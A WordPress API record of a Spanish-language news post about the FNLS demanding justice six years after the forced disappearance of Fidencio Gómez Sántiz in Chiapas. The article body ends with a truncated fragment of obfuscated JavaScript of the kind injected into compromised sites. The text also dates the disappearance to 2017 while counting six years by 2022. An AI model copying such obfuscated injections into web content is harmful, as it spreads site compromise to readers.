{"id":227,"date":"2022-03-07T05:17:21","date_gmt":"2022-03-07T05:17:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=227"},"modified":"2022-03-07T05:17:23","modified_gmt":"2022-03-07T05:17:23","slug":"a-seis-anos-de-la-desaparicion-de-fidencio-gomez-no-hay-justicia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=227","title":{"rendered":"A seis a\u00f1os de la desaparici\u00f3n de Fidencio G\u00f3mez, no hay justicia"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"712\" height=\"534\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2020-03-05-at-4.05.34-PM.jpeg\" alt=\"\" class=\"wp-image-228\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2020-03-05-at-4.05.34-PM.jpeg 712w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2020-03-05-at-4.05.34-PM-300x225.jpeg 300w\" sizes=\"auto, (max-width: 712px) 100vw, 712px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>06 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- El Frente Nacional de Lucha por el Socialismo (FNLS) dio a conocer que se mantendr\u00e1 en la exigencia de juicio y castigo a los autores materiales e intelectuales de la \u201cdesaparici\u00f3n forzada\u201d de Fidencio G\u00f3mez, as\u00ed como a la exigencia de presentaci\u00f3n con vida \u201ces bandera de lucha, la pol\u00edtica de perd\u00f3n y olvido no es opci\u00f3n del movimiento popular y menos a\u00fan de quienes somos v\u00edctimas de los cr\u00edmenes de Estado\u201d. En un comunicado de prensa, recuerdan que el pasado 5 de marzo se cumplieron 6 a\u00f1os de la detenci\u00f3n desaparici\u00f3n forzada de Fidencio G\u00f3mez S\u00e1ntiz, \u201cun crimen de lesa humanidad y de Estado que se mantiene en total impunidad desde el gobierno de Enrique Pe\u00f1a Nieto hasta el gobierno actual bajo la pol\u00edtica de la cuarta transformaci\u00f3n. No existe voluntad pol\u00edtica para investigar, castigar a los responsables y presentarlos con vida\u201d. Recuerdan que la desaparici\u00f3n de Fidencio G\u00f3mez, perpetrada el 5 de marzo de 2017 fue en un contexto de violencia de Estado \u201ca trav\u00e9s de la agresi\u00f3n polic\u00edaca paramilitar&#8221;. El 29 de septiembre el grupo paramilitar Los Petules comete un asesinato pol\u00edtico en contra de nuestro compa\u00f1ero H\u00e9ctor S\u00e1ntiz L\u00f3pez, el 28 de febrero de 2017 fue ejecutado de manera extrajudicial nuestro compa\u00f1ero Humberto Morales de 13 a\u00f1os de edad. Cr\u00edmenes impunes y la agresi\u00f3n paramilitar contin\u00faa en esta administraci\u00f3n\u201d. Lamentan que en los \u00faltimos informes que recibimos sobre el caso, no exist\u00eda m\u00e1s que unas hojas en la Carpeta de Investigaci\u00f3n (CI) que adem\u00e1s que la hab\u00edan extraviado; \u201clos hechos comprueban la pol\u00edtica de gobierno que existe hacia las v\u00edctimas de los cr\u00edmenes de lesa humanidad y de Estado, se niega el acceso a la justicia y se protege a los autores materiales e intelectuales como pol\u00edtica de gobierno contra el pueblo organizado\u201d. <\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 06 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- El Frente Nacional de Lucha por el Socialismo (FNLS) dio a conocer que se mantendr\u00e1 en la exigencia de juicio y castigo a los autores materiales e intelectuales de la \u201cdesaparici\u00f3n forzada\u201d de Fidencio G\u00f3mez, as\u00ed como a la exigencia de presentaci\u00f3n con &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-227","post","type-post","status-publish","format-standard","","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/227","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=227"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/227\/revisions"}],"predecessor-version":[{"id":229,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/227\/revisions\/229"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=227"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=227"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}